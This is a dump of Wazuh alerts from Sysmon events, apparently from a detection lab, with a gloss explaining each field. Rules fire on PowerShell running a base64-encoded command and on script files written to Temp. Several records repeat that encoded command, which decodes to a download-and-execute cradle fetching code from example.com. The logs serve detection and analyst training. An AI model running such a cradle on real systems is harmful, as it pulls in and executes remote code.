Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dufuzwko.3br.ps1
CreationUtcTime: 2025-04-24 22:39:43.500
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:43.503 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdac-680a-ad0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dufuzwko.3br.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:43.500 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 93 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534388.1892344 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:45.8395470Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285469 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:44.666
ProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00}
ProcessId: 4736
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00}
ParentProcessId: 4284
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:44.666 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb0-680a-b00b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4736 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 97 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534388.1900407 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:46.0684203Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285470 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:46.062
ProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00}
ProcessId: 4736
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_epfzzdna.g5t.ps1
CreationUtcTime: 2025-04-24 22:39:46.062
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:46.062 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb0-680a-b00b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4736 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_epfzzdna.g5t.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:46.062 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 94 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534391.1903172 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:48.4763635Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285495 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:47.286
ProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00}
ProcessId: 10488
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00}
ParentProcessId: 4736
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:47.286 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb3-680a-b30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10488 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4736 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 98 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534391.1911239 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:48.7171585Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285496 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:48.710
ProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00}
ProcessId: 10488
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pn3p00ne.adg.ps1
CreationUtcTime: 2025-04-24 22:39:48.710
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:48.710 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb3-680a-b30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10488 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pn3p00ne.adg.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:48.710 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 95 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534392.1914008 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:50.5947163Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285521 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:49.622
